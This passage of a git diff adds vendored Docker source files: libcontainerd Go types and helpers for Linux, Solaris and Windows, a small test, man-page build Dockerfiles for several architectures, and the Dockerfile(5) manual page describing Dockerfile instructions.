+	Terminal bool // Whether stderr is connected on Windows
+}
+
+// ServerVersion contains version information as retrieved from the
+// server
+type ServerVersion struct {
+	containerd.GetServerVersionResponse
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/types_linux.go b/vendor/github.com/docker/docker/libcontainerd/types_linux.go
new file mode 100644
index 0000000000..cc2a17aec6
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/types_linux.go
@@ -0,0 +1,49 @@
+package libcontainerd
+
+import (
+	containerd "github.com/docker/containerd/api/grpc/types"
+	"github.com/opencontainers/runtime-spec/specs-go"
+)
+
+// Process contains information to start a specific application inside the container.
+type Process struct {
+	// Terminal creates an interactive terminal for the container.
+	Terminal bool `json:"terminal"`
+	// User specifies user information for the process.
+	User *specs.User `json:"user"`
+	// Args specifies the binary and arguments for the application to execute.
+	Args []string `json:"args"`
+	// Env populates the process environment for the process.
+	Env []string `json:"env,omitempty"`
+	// Cwd is the current working directory for the process and must be
+	// relative to the container's root.
+	Cwd *string `json:"cwd"`
+	// Capabilities are linux capabilities that are kept for the container.
+	Capabilities []string `json:"capabilities,omitempty"`
+	// Rlimits specifies rlimit options to apply to the process.
+	Rlimits []specs.Rlimit `json:"rlimits,omitempty"`
+	// ApparmorProfile specifies the apparmor profile for the container.
+	ApparmorProfile *string `json:"apparmorProfile,omitempty"`
+	// SelinuxLabel specifies the selinux context that the container process is run as.
+	SelinuxLabel *string `json:"selinuxLabel,omitempty"`
+}
+
+// StateInfo contains description about the new state container has entered.
+type StateInfo struct {
+	CommonStateInfo
+
+	// Platform specific StateInfo
+	OOMKilled bool
+}
+
+// Stats contains a stats properties from containerd.
+type Stats containerd.StatsResponse
+
+// Summary contains a container summary from containerd
+type Summary struct{}
+
+// Resources defines updatable container resource values.
+type Resources containerd.UpdateResource
+
+// Checkpoints contains the details of a checkpoint
+type Checkpoints containerd.ListCheckpointResponse
diff --git a/vendor/github.com/docker/docker/libcontainerd/types_solaris.go b/vendor/github.com/docker/docker/libcontainerd/types_solaris.go
new file mode 100644
index 0000000000..dbafef669f
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/types_solaris.go
@@ -0,0 +1,43 @@
+package libcontainerd
+
+import (
+	containerd "github.com/docker/containerd/api/grpc/types"
+	"github.com/opencontainers/runtime-spec/specs-go"
+)
+
+// Process contains information to start a specific application inside the container.
+type Process struct {
+	// Terminal creates an interactive terminal for the container.
+	Terminal bool `json:"terminal"`
+	// User specifies user information for the process.
+	User *specs.User `json:"user"`
+	// Args specifies the binary and arguments for the application to execute.
+	Args []string `json:"args"`
+	// Env populates the process environment for the process.
+	Env []string `json:"env,omitempty"`
+	// Cwd is the current working directory for the process and must be
+	// relative to the container's root.
+	Cwd *string `json:"cwd"`
+	// Capabilities are linux capabilities that are kept for the container.
+	Capabilities []string `json:"capabilities,omitempty"`
+}
+
+// Stats contains a stats properties from containerd.
+type Stats struct{}
+
+// Summary contains a container summary from containerd
+type Summary struct{}
+
+// StateInfo contains description about the new state container has entered.
+type StateInfo struct {
+	CommonStateInfo
+
+	// Platform specific StateInfo
+	OOMKilled bool
+}
+
+// Resources defines updatable container resource values.
+type Resources struct{}
+
+// Checkpoints contains the details of a checkpoint
+type Checkpoints containerd.ListCheckpointResponse
diff --git a/vendor/github.com/docker/docker/libcontainerd/types_windows.go b/vendor/github.com/docker/docker/libcontainerd/types_windows.go
new file mode 100644
index 0000000000..24a9a96440
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/types_windows.go
@@ -0,0 +1,79 @@
+package libcontainerd
+
+import (
+	"github.com/Microsoft/hcsshim"
+	"github.com/opencontainers/runtime-spec/specs-go"
+)
+
+// Process contains information to start a specific application inside the container.
+type Process specs.Process
+
+// Summary contains a ProcessList item from HCS to support `top`
+type Summary hcsshim.ProcessListItem
+
+// StateInfo contains description about the new state container has entered.
+type StateInfo struct {
+	CommonStateInfo
+
+	// Platform specific StateInfo
+
+	UpdatePending bool // Indicates that there are some update operations pending that should be completed by a servicing container.
+}
+
+// Stats contains statics from HCS
+type Stats hcsshim.Statistics
+
+// Resources defines updatable container resource values.
+type Resources struct{}
+
+// ServicingOption is a CreateOption with a no-op application that signifies
+// the container needs to be used for a Windows servicing operation.
+type ServicingOption struct {
+	IsServicing bool
+}
+
+// FlushOption is a CreateOption that signifies if the container should be
+// started with flushes ignored until boot has completed. This is an optimisation
+// for first boot of a container.
+type FlushOption struct {
+	IgnoreFlushesDuringBoot bool
+}
+
+// HyperVIsolationOption is a CreateOption that indicates whether the runtime
+// should start the container as a Hyper-V container, and if so, the sandbox path.
+type HyperVIsolationOption struct {
+	IsHyperV    bool
+	SandboxPath string `json:",omitempty"`
+}
+
+// LayerOption is a CreateOption that indicates to the runtime the layer folder
+// and layer paths for a container.
+type LayerOption struct {
+	// LayerFolder is the path to the current layer folder. Empty for Hyper-V containers.
+	LayerFolderPath string `json:",omitempty"`
+	// Layer paths of the parent layers
+	LayerPaths []string
+}
+
+// NetworkEndpointsOption is a CreateOption that provides the runtime list
+// of network endpoints to which a container should be attached during its creation.
+type NetworkEndpointsOption struct {
+	Endpoints                []string
+	AllowUnqualifiedDNSQuery bool
+}
+
+// CredentialsOption is a CreateOption that indicates the credentials from
+// a credential spec to be used to the runtime
+type CredentialsOption struct {
+	Credentials string
+}
+
+// Checkpoint holds the details of a checkpoint (not supported in windows)
+type Checkpoint struct {
+	Name string
+}
+
+// Checkpoints contains the details of a checkpoint
+type Checkpoints struct {
+	Checkpoints []*Checkpoint
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/utils_linux.go b/vendor/github.com/docker/docker/libcontainerd/utils_linux.go
new file mode 100644
index 0000000000..78828bcdad
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/utils_linux.go
@@ -0,0 +1,62 @@
+package libcontainerd
+
+import (
+	"syscall"
+
+	containerd "github.com/docker/containerd/api/grpc/types"
+	"github.com/opencontainers/runtime-spec/specs-go"
+)
+
+func getRootIDs(s specs.Spec) (int, int, error) {
+	var hasUserns bool
+	for _, ns := range s.Linux.Namespaces {
+		if ns.Type == specs.UserNamespace {
+			hasUserns = true
+			break
+		}
+	}
+	if !hasUserns {
+		return 0, 0, nil
+	}
+	uid := hostIDFromMap(0, s.Linux.UIDMappings)
+	gid := hostIDFromMap(0, s.Linux.GIDMappings)
+	return uid, gid, nil
+}
+
+func hostIDFromMap(id uint32, mp []specs.IDMapping) int {
+	for _, m := range mp {
+		if id >= m.ContainerID && id <= m.ContainerID+m.Size-1 {
+			return int(m.HostID + id - m.ContainerID)
+		}
+	}
+	return 0
+}
+
+func systemPid(ctr *containerd.Container) uint32 {
+	var pid uint32
+	for _, p := range ctr.Processes {
+		if p.Pid == InitFriendlyName {
+			pid = p.SystemPid
+		}
+	}
+	return pid
+}
+
+func convertRlimits(sr []specs.Rlimit) (cr []*containerd.Rlimit) {
+	for _, r := range sr {
+		cr = append(cr, &containerd.Rlimit{
+			Type: r.Type,
+			Hard: r.Hard,
+			Soft: r.Soft,
+		})
+	}
+	return
+}
+
+// setPDeathSig sets the parent death signal to SIGKILL
+func setSysProcAttr(sid bool) *syscall.SysProcAttr {
+	return &syscall.SysProcAttr{
+		Setsid:    sid,
+		Pdeathsig: syscall.SIGKILL,
+	}
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/utils_solaris.go b/vendor/github.com/docker/docker/libcontainerd/utils_solaris.go
new file mode 100644
index 0000000000..49632b45e5
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/utils_solaris.go
@@ -0,0 +1,27 @@
+package libcontainerd
+
+import (
+	"syscall"
+
+	containerd "github.com/docker/containerd/api/grpc/types"
+	"github.com/opencontainers/runtime-spec/specs-go"
+)
+
+func getRootIDs(s specs.Spec) (int, int, error) {
+	return 0, 0, nil
+}
+
+func systemPid(ctr *containerd.Container) uint32 {
+	var pid uint32
+	for _, p := range ctr.Processes {
+		if p.Pid == InitFriendlyName {
+			pid = p.SystemPid
+		}
+	}
+	return pid
+}
+
+// setPDeathSig sets the parent death signal to SIGKILL
+func setSysProcAttr(sid bool) *syscall.SysProcAttr {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/utils_windows.go b/vendor/github.com/docker/docker/libcontainerd/utils_windows.go
new file mode 100644
index 0000000000..41ac40d2c2
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/utils_windows.go
@@ -0,0 +1,46 @@
+package libcontainerd
+
+import "strings"
+
+// setupEnvironmentVariables converts a string array of environment variables
+// into a map as required by the HCS. Source array is in format [v1=k1] [v2=k2] etc.
+func setupEnvironmentVariables(a []string) map[string]string {
+	r := make(map[string]string)
+	for _, s := range a {
+		arr := strings.SplitN(s, "=", 2)
+		if len(arr) == 2 {
+			r[arr[0]] = arr[1]
+		}
+	}
+	return r
+}
+
+// Apply for a servicing option is a no-op.
+func (s *ServicingOption) Apply(interface{}) error {
+	return nil
+}
+
+// Apply for the flush option is a no-op.
+func (f *FlushOption) Apply(interface{}) error {
+	return nil
+}
+
+// Apply for the hypervisolation option is a no-op.
+func (h *HyperVIsolationOption) Apply(interface{}) error {
+	return nil
+}
+
+// Apply for the layer option is a no-op.
+func (h *LayerOption) Apply(interface{}) error {
+	return nil
+}
+
+// Apply for the network endpoints option is a no-op.
+func (s *NetworkEndpointsOption) Apply(interface{}) error {
+	return nil
+}
+
+// Apply for the credentials option is a no-op.
+func (s *CredentialsOption) Apply(interface{}) error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/utils_windows_test.go b/vendor/github.com/docker/docker/libcontainerd/utils_windows_test.go
new file mode 100644
index 0000000000..f3679bfb71
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/utils_windows_test.go
@@ -0,0 +1,13 @@
+package libcontainerd
+
+import (
+	"testing"
+)
+
+func TestEnvironmentParsing(t *testing.T) {
+	env := []string{"foo=bar", "car=hat", "a=b=c"}
+	result := setupEnvironmentVariables(env)
+	if len(result) != 3 || result["foo"] != "bar" || result["car"] != "hat" || result["a"] != "b=c" {
+		t.Fatalf("Expected map[foo:bar car:hat a:b=c], got %v", result)
+	}
+}
diff --git a/vendor/github.com/docker/docker/man/Dockerfile b/vendor/github.com/docker/docker/man/Dockerfile
new file mode 100644
index 0000000000..80e97ff01e
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/Dockerfile
@@ -0,0 +1,24 @@
+FROM    golang:1.7.5-alpine
+
+RUN     apk add -U git bash curl gcc musl-dev make
+
+RUN     mkdir -p /go/src /go/bin /go/pkg
+RUN     export GLIDE=v0.11.1; \
+        export TARGET=/go/src/github.com/Masterminds; \
+        mkdir -p ${TARGET} && \
+        git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \
+        cd ${TARGET}/glide && \
+        git checkout $GLIDE && \
+        make build && \
+        cp ./glide /usr/bin/glide && \
+        cd / && rm -rf /go/src/* /go/bin/* /go/pkg/*
+
+COPY    glide.yaml /manvendor/
+COPY    glide.lock /manvendor/
+WORKDIR /manvendor/
+RUN     glide install && mv vendor src
+ENV     GOPATH=$GOPATH:/manvendor
+RUN     go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man
+
+WORKDIR /go/src/github.com/docker/docker/
+ENTRYPOINT ["man/generate.sh"]
diff --git a/vendor/github.com/docker/docker/man/Dockerfile.5.md b/vendor/github.com/docker/docker/man/Dockerfile.5.md
new file mode 100644
index 0000000000..5191b1930a
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/Dockerfile.5.md
@@ -0,0 +1,474 @@
+% DOCKERFILE(5) Docker User Manuals
+% Zac Dover
+% May 2014
+# NAME
+
+Dockerfile - automate the steps of creating a Docker image
+
+# INTRODUCTION
+
+The **Dockerfile** is a configuration file that automates the steps of creating
+a Docker image. It is similar to a Makefile. Docker reads instructions from the
+**Dockerfile** to automate the steps otherwise performed manually to create an
+image. To build an image, create a file called **Dockerfile**.
+
+The **Dockerfile** describes the steps taken to assemble the image. When the
+**Dockerfile** has been created, call the `docker build` command, using the
+path of directory that contains **Dockerfile** as the argument.
+
+# SYNOPSIS
+
+INSTRUCTION arguments
+
+For example:
+
+  FROM image
+
+# DESCRIPTION
+
+A Dockerfile is a file that automates the steps of creating a Docker image.
+A Dockerfile is similar to a Makefile.
+
+# USAGE
+
+  docker build .
+
+  -- Runs the steps and commits them, building a final image.
+  The path to the source repository defines where to find the context of the
+  build. The build is run by the Docker daemon, not the CLI. The whole
+  context must be transferred to the daemon. The Docker CLI reports
+  `"Sending build context to Docker daemon"` when the context is sent to the
+  daemon.
+
+  ```
+  docker build -t repository/tag .
+  ```
+
+  -- specifies a repository and tag at which to save the new image if the build
+  succeeds. The Docker daemon runs the steps one-by-one, committing the result
+  to a new image if necessary, before finally outputting the ID of the new
+  image. The Docker daemon automatically cleans up the context it is given.
+
+  Docker re-uses intermediate images whenever possible. This significantly
+  accelerates the *docker build* process.
+
+# FORMAT
+
+  `FROM image`
+
+  `FROM image:tag`
+
+  `FROM image@digest`
+
+  -- The **FROM** instruction sets the base image for subsequent instructions. A
+  valid Dockerfile must have **FROM** as its first instruction. The image can be any
+  valid image. It is easy to start by pulling an image from the public
+  repositories.
+
+  -- **FROM** must be the first non-comment instruction in Dockerfile.
+
+  -- **FROM** may appear multiple times within a single Dockerfile in order to create
+  multiple images. Make a note of the last image ID output by the commit before
+  each new **FROM** command.
+
+  -- If no tag is given to the **FROM** instruction, Docker applies the
+  `latest` tag. If the used tag does not exist, an error is returned.
+
+  -- If no digest is given to the **FROM** instruction, Docker applies the
+  `latest` tag. If the used tag does not exist, an error is returned.
+
+**MAINTAINER**
+  -- **MAINTAINER** sets the Author field for the generated images.
+  Useful for providing users with an email or url for support.
+
+**RUN**
+  -- **RUN** has two forms:
+
+  ```
+  # the command is run in a shell - /bin/sh -c
+  RUN <command>
+
+  # Executable form
+  RUN ["executable", "param1", "param2"]
+  ```
+
+
+  -- The **RUN** instruction executes any commands in a new layer on top of the current
+  image and commits the results. The committed image is used for the next step in
+  Dockerfile.
+
+  -- Layering **RUN** instructions and generating commits conforms to the core
+  concepts of Docker where commits are cheap and containers can be created from
+  any point in the history of an image. This is similar to source control.  The
+  exec form makes it possible to avoid shell string munging. The exec form makes
+  it possible to **RUN** commands using a base image that does not contain `/bin/sh`.
+
+  Note that the exec form is parsed as a JSON array, which means that you must
+  use double-quotes (") around words not single-quotes (').
+
+**CMD**
+  -- **CMD** has three forms:
+
+  ```
+  # Executable form
+  CMD ["executable", "param1", "param2"]`
+
+  # Provide default arguments to ENTRYPOINT
+  CMD ["param1", "param2"]`
+
+  # the command is run in a shell - /bin/sh -c
+  CMD command param1 param2
+  ```
+
+  -- There should be only one **CMD** in a Dockerfile. If more than one **CMD** is listed, only
+  the last **CMD** takes effect.
+  The main purpose of a **CMD** is to provide defaults for an executing container.
+  These defaults may include an executable, or they can omit the executable. If
+  they omit the executable, an **ENTRYPOINT** must be specified.
+  When used in the shell or exec formats, the **CMD** instruction sets the command to
+  be executed when running the image.
+  If you use the shell form of the **CMD**, the `<command>` executes in `/bin/sh -c`:
+
+  Note that the exec form is parsed as a JSON array, which means that you must
+  use double-quotes (") around words not single-quotes (').
+
+  ```
+  FROM ubuntu
+  CMD echo "This is a test." | wc -
+  ```
+
+  -- If you run **command** without a shell, then you must express the command as a
+  JSON array and give the full path to the executable. This array form is the
+  preferred form of **CMD**. All additional parameters must be individually expressed
+  as strings in the array:
+
+  ```
+  FROM ubuntu
+  CMD ["/usr/bin/wc","--help"]
+  ```
+
+  -- To make the container run the same executable every time, use **ENTRYPOINT** in
+  combination with **CMD**.
+  If the user specifies arguments to `docker run`, the specified commands
+  override the default in **CMD**.
+  Do not confuse **RUN** with **CMD**. **RUN** runs a command and commits the result.
+  **CMD** executes nothing at build time, but specifies the intended command for
+  the image.
+
+**LABEL**
+  -- `LABEL <key>=<value> [<key>=<value> ...]`or
+  ```
+  LABEL <key>[ <value>]
+  LABEL <key>[ <value>]
+  ...
+  ```
+  The **LABEL** instruction adds metadata to an image. A **LABEL** is a
+  key-value pair. To specify a **LABEL** without a value, simply use an empty
+  string. To include spaces within a **LABEL** value, use quotes and
+  backslashes as you would in command-line parsing.
+
+  ```
+  LABEL com.example.vendor="ACME Incorporated"
+  LABEL com.example.vendor "ACME Incorporated"
+  LABEL com.example.vendor.is-beta ""
+  LABEL com.example.vendor.is-beta=
+  LABEL com.example.vendor.is-beta=""
+  ```
+
+  An image can have more than one label. To specify multiple labels, separate
+  each key-value pair by a space.
+
+  Labels are additive including `LABEL`s in `FROM` images. As the system
+  encounters and then applies a new label, new `key`s override any previous
+  labels with identical keys.
+
+  To display an image's labels, use the `docker inspect` command.
+
+**EXPOSE**
+  -- `EXPOSE <port> [<port>...]`
+  The **EXPOSE** instruction informs Docker that the container listens on the
+  specified network ports at runtime. Docker uses this information to
+  interconnect containers using links and to set up port redirection on the host
+  system.
+
+**ENV**
+  -- `ENV <key> <value>`
+  The **ENV** instruction sets the environment variable <key> to
+  the value `<value>`. This value is passed to all future
+  **RUN**, **ENTRYPOINT**, and **CMD** instructions. This is
+  functionally equivalent to prefixing the command with `<key>=<value>`.  The
+  environment variables that are set with **ENV** persist when a container is run
+  from the resulting image. Use `docker inspect` to inspect these values, and
+  change them using `docker run --env <key>=<value>`.
+
+  Note that setting "`ENV DEBIAN_FRONTEND noninteractive`" may cause
+  unintended consequences, because it will persist when the container is run
+  interactively, as with the following command: `docker run -t -i image bash`
+
+**ADD**
+  -- **ADD** has two forms:
+
+  ```
+  ADD <src> <dest>
+
+  # Required for paths with whitespace
+  ADD ["<src>",... "<dest>"]
+  ```
+
+  The **ADD** instruction copies new files, directories
+  or remote file URLs to the filesystem of the container at path `<dest>`.
+  Multiple `<src>` resources may be specified but if they are files or directories
+  then they must be relative to the source directory that is being built
+  (the context of the build). The `<dest>` is the absolute path, or path relative
+  to **WORKDIR**, into which the source is copied inside the target container.
+  If the `<src>` argument is a local file in a recognized compression format
+  (tar, gzip, bzip2, etc) then it is unpacked at the specified `<dest>` in the
+  container's filesystem.  Note that only local compressed files will be unpacked,
+  i.e., the URL download and archive unpacking features cannot be used together.
+  All new directories are created with mode 0755 and with the uid and gid of **0**.
+
+**COPY**
+  -- **COPY** has two forms:
+
+  ```
+  COPY <src> <dest>
+
+  # Required for paths with whitespace
+  COPY ["<src>",... "<dest>"]
+  ```
+
+  The **COPY** instruction copies new files from `<src>` and
+  adds them to the filesystem of the container at path <dest>. The `<src>` must be
+  the path to a file or directory relative to the source directory that is
+  being built (the context of the build) or a remote file URL. The `<dest>` is an
+  absolute path, or a path relative to **WORKDIR**, into which the source will
+  be copied inside the target container. If you **COPY** an archive file it will
+  land in the container exactly as it appears in the build context without any
+  attempt to unpack it.  All new files and directories are created with mode **0755**
+  and with the uid and gid of **0**.
+
+**ENTRYPOINT**
+  -- **ENTRYPOINT** has two forms:
+
+  ```
+  # executable form
+  ENTRYPOINT ["executable", "param1", "param2"]`
+
+  # run command in a shell - /bin/sh -c
+  ENTRYPOINT command param1 param2
+  ```
+
+  -- An **ENTRYPOINT** helps you configure a
+  container that can be run as an executable. When you specify an **ENTRYPOINT**,
+  the whole container runs as if it was only that executable.  The **ENTRYPOINT**
+  instruction adds an entry command that is not overwritten when arguments are
+  passed to docker run. This is different from the behavior of **CMD**. This allows
+  arguments to be passed to the entrypoint, for instance `docker run <image> -d`
+  passes the -d argument to the **ENTRYPOINT**.  Specify parameters either in the
+  **ENTRYPOINT** JSON array (as in the preferred exec form above), or by using a **CMD**
+  statement.  Parameters in the **ENTRYPOINT** are not overwritten by the docker run
+  arguments.  Parameters specified via **CMD** are overwritten by docker run
+  arguments.  Specify a plain string for the **ENTRYPOINT**, and it will execute in
+  `/bin/sh -c`, like a **CMD** instruction:
+
+  ```
+  FROM ubuntu
+  ENTRYPOINT wc -l -
+  ```
+
+  This means that the Dockerfile's image always takes stdin as input (that's
+  what "-" means), and prints the number of lines (that's what "-l" means). To
+  make this optional but default, use a **CMD**:
+
+  ```
+  FROM ubuntu
+  CMD ["-l", "-"]
+  ENTRYPOINT ["/usr/bin/wc"]
+  ```
+
+**VOLUME**
+  -- `VOLUME ["/data"]`
+  The **VOLUME** instruction creates a mount point with the specified name and marks
+  it as holding externally-mounted volumes from the native host or from other
+  containers.
+
+**USER**
+  -- `USER daemon`
+  Sets the username or UID used for running subsequent commands.
+
+  The **USER** instruction can optionally be used to set the group or GID. The
+  followings examples are all valid:
+  USER [user | user:group | uid | uid:gid | user:gid | uid:group ]
+
+  Until the **USER** instruction is set, instructions will be run as root. The USER
+  instruction can be used any number of times in a Dockerfile, and will only affect
+  subsequent commands.
+
+**WORKDIR**
+  -- `WORKDIR /path/to/workdir`
+  The **WORKDIR** instruction sets the working directory for the **RUN**, **CMD**,
+  **ENTRYPOINT**, **COPY** and **ADD** Dockerfile commands that follow it. It can
+  be used multiple times in a single Dockerfile. Relative paths are defined
+  relative to the path of the previous **WORKDIR** instruction. For example:
+
+  ```
+  WORKDIR /a
+  WORKDIR b
+  WORKDIR c
+  RUN pwd
+  ```
+
+  In the above example, the output of the **pwd** command is **a/b/c**.
+
+**ARG**
+   -- ARG <name>[=<default value>]
+
+  The `ARG` instruction defines a variable that users can pass at build-time to
+  the builder with the `docker build` command using the `--build-arg
+  <varname>=<value>` flag. If a user specifies a build argument that was not
+  defined in the Dockerfile, the build outputs a warning.
+
+  ```
+  [Warning] One or more build-args [foo] were not consumed
+  ```
+
+  The Dockerfile author can define a single variable by specifying `ARG` once or many
+  variables by specifying `ARG` more than once. For example, a valid Dockerfile:
+
+  ```
+  FROM busybox
+  ARG user1
+  ARG buildno
+  ...
+  ```
+
+  A Dockerfile author may optionally specify a default value for an `ARG` instruction:
+
+  ```
+  FROM busybox
+  ARG user1=someuser
+  ARG buildno=1
+  ...
+  ```
+
+  If an `ARG` value has a default and if there is no value passed at build-time, the
+  builder uses the default.
+
+  An `ARG` variable definition comes into effect from the line on which it is
+  defined in the `Dockerfile` not from the argument's use on the command-line or
+  elsewhere.  For example, consider this Dockerfile:
+
+  ```
+  1 FROM busybox
+  2 USER ${user:-some_user}
+  3 ARG user
+  4 USER $user
+  ...
+  ```
+  A user builds this file by calling:
+
+  ```
+  $ docker build --build-arg user=what_user Dockerfile
+  ```
+
+  The `USER` at line 2 evaluates to `some_user` as the `user` variable is defined on the
+  subsequent line 3. The `USER` at line 4 evaluates to `what_user` as `user` is
+  defined and the `what_user` value was passed on the command line. Prior to its definition by an
+  `ARG` instruction, any use of a variable results in an empty string.
+
+  > **Warning:** It is not recommended to use build-time variables for
+  >  passing secrets like github keys, user credentials etc. Build-time variable
+  >  values are visible to any user of the image with the `docker history` command.
+
+  You can use an `ARG` or an `ENV` instruction to specify variables that are
+  available to the `RUN` instruction. Environment variables defined using the
+  `ENV` instruction always override an `ARG` instruction of the same name. Consider
+  this Dockerfile with an `ENV` and `ARG` instruction.
+
+  ```
+  1 FROM ubuntu
+  2 ARG CONT_IMG_VER
+  3 ENV CONT_IMG_VER v1.0.0
+  4 RUN echo $CONT_IMG_VER
+  ```
+  Then, assume this image is built with this command:
+
+  ```
+  $ docker build --build-arg CONT_IMG_VER=v2.0.1 Dockerfile
+  ```
+
+  In this case, the `RUN` instruction uses `v1.0.0` instead of the `ARG` setting
+  passed by the user:`v2.0.1` This behavior is similar to a shell
+  script where a locally scoped variable overrides the variables passed as
+  arguments or inherited from environment, from its point of definition.
+
+  Using the example above but a different `ENV` specification you can create more
+  useful interactions between `ARG` and `ENV` instructions:
+
+  ```
+  1 FROM ubuntu
+  2 ARG CONT_IMG_VER
+  3 ENV CONT_IMG_VER ${CONT_IMG_VER:-v1.0.0}
+  4 RUN echo $CONT_IMG_VER
+  ```
+
+  Unlike an `ARG` instruction, `ENV` values are always persisted in the built
+  image. Consider a docker build without the --build-arg flag:
+
+  ```
+  $ docker build Dockerfile
+  ```
+
+  Using this Dockerfile example, `CONT_IMG_VER` is still persisted in the image but
+  its value would be `v1.0.0` as it is the default set in line 3 by the `ENV` instruction.
+
+  The variable expansion technique in this example allows you to pass arguments
+  from the command line and persist them in the final image by leveraging the
+  `ENV` instruction. Variable expansion is only supported for [a limited set of
+  Dockerfile instructions.](#environment-replacement)
+
+  Docker has a set of predefined `ARG` variables that you can use without a
+  corresponding `ARG` instruction in the Dockerfile.
+
+  * `HTTP_PROXY`
+  * `http_proxy`
+  * `HTTPS_PROXY`
+  * `https_proxy`
+  * `FTP_PROXY`
+  * `ftp_proxy`
+  * `NO_PROXY`
+  * `no_proxy`
+
+  To use these, simply pass them on the command line using the `--build-arg
+  <varname>=<value>` flag.
+
+**ONBUILD**
+  -- `ONBUILD [INSTRUCTION]`
+  The **ONBUILD** instruction adds a trigger instruction to an image. The
+  trigger is executed at a later time, when the image is used as the base for
+  another build. Docker executes the trigger in the context of the downstream
+  build, as if the trigger existed immediately after the **FROM** instruction in
+  the downstream Dockerfile.
+
+  You can register any build instruction as a trigger. A trigger is useful if
+  you are defining an image to use as a base for building other images. For
+  example, if you are defining an application build environment or a daemon that
+  is customized with a user-specific configuration.  
+
+  Consider an image intended as a reusable python application builder. It must
+  add application source code to a particular directory, and might need a build
+  script called after that. You can't just call **ADD** and **RUN** now, because
+  you don't yet have access to the application source code, and it is different
+  for each application build.
+
+  -- Providing application developers with a boilerplate Dockerfile to copy-paste
+  into their application is inefficient, error-prone, and
+  difficult to update because it mixes with application-specific code.
+  The solution is to use **ONBUILD** to register instructions in advance, to
+  run later, during the next build stage.
+
+# HISTORY
+*May 2014, Compiled by Zac Dover (zdover at redhat dot com) based on docker.com Dockerfile documentation.
+*Feb 2015, updated by Brian Goff (cpuguy83@gmail.com) for readability
+*Sept 2015, updated by Sally O'Malley (somalley@redhat.com)
+*Oct 2016, updated by Addam Hardy (addam.hardy@gmail.com)
diff --git a/vendor/github.com/docker/docker/man/Dockerfile.aarch64 b/vendor/github.com/docker/docker/man/Dockerfile.aarch64
new file mode 100644
index 0000000000..e788eb1c1d
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/Dockerfile.aarch64
@@ -0,0 +1,25 @@
+FROM    aarch64/ubuntu:xenial
+
+RUN     apt-get update && apt-get install -y git golang-go
+
+RUN     mkdir -p /go/src /go/bin /go/pkg
+ENV     GOPATH=/go
+RUN     export GLIDE=v0.11.1; \
+        export TARGET=/go/src/github.com/Masterminds; \
+        mkdir -p ${TARGET} && \
+        git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \
+        cd ${TARGET}/glide && \
+        git checkout $GLIDE && \
+        make build && \
+        cp ./glide /usr/bin/glide && \
+        cd / && rm -rf /go/src/* /go/bin/* /go/pkg/*
+
+COPY    glide.yaml /manvendor/
+COPY    glide.lock /manvendor/
+WORKDIR /manvendor/
+RUN     glide install && mv vendor src
+ENV     GOPATH=$GOPATH:/manvendor
+RUN     go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man
+
+WORKDIR /go/src/github.com/docker/docker/
+ENTRYPOINT ["man/generate.sh"]
diff --git a/vendor/github.com/docker/docker/man/Dockerfile.armhf b/vendor/github.com/docker/docker/man/Dockerfile.armhf
new file mode 100644
index 0000000000..e7ea495646
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/Dockerfile.armhf
@@ -0,0 +1,43 @@
+FROM armhf/debian:jessie
+
+# allow replacing httpredir or deb mirror
+ARG APT_MIRROR=deb.debian.org
+RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list
+
+RUN apt-get update && apt-get install -y \
+  git \
+  bash \
+  curl \
+  gcc \
+  make
+
+ENV GO_VERSION 1.7.5
+RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" \
+  | tar -xzC /usr/local
+ENV PATH /go/bin:/usr/local/go/bin:$PATH
+ENV GOPATH /go
+
+# We're building for armhf, which is ARMv7, so let's be explicit about that
+ENV GOARCH arm
+ENV GOARM 7
+
+RUN     mkdir -p /go/src /go/bin /go/pkg
+RUN     export GLIDE=v0.11.1; \
+        export TARGET=/go/src/github.com/Masterminds; \
+        mkdir -p ${TARGET} && \
+        git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \
+        cd ${TARGET}/glide && \
+        git checkout $GLIDE && \
+        make build && \
+        cp ./glide /usr/bin/glide && \
+        cd / && rm -rf /go/src/* /go/bin/* /go/pkg/*
+
+COPY    glide.yaml /manvendor/
+COPY    glide.lock /manvendor/
+WORKDIR /manvendor/
+RUN     glide install && mv vendor src
+ENV     GOPATH=$GOPATH:/manvendor
+RUN     go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man
+
+WORKDIR /go/src/github.com/docker/docker/
+ENTRYPOINT ["man/generate.sh"]
diff --git a/vendor/github.com/docker/docker/man/Dockerfile.ppc64le b/vendor/github.com/docker/docker/man/Dockerfile.ppc64le
new file mode 100644
index 0000000000..fc96ca7691
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/Dockerfile.ppc64le
@@ -0,0 +1,35 @@
+FROM    ppc64le/ubuntu:xenial
+
+RUN     apt-get update && apt-get install -y \
+        curl \
+        gcc \
+        git \
+        make \
+        tar
+
+ENV     GO_VERSION 1.7.5
+RUN     curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" \
+        | tar -xzC /usr/local
+ENV     PATH /usr/local/go/bin:$PATH
+ENV     GOPATH=/go
+
+RUN     mkdir -p /go/src /go/bin /go/pkg
+RUN     export GLIDE=v0.11.1; \
+        export TARGET=/go/src/github.com/Masterminds; \
+        mkdir -p ${TARGET} && \
+        git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \
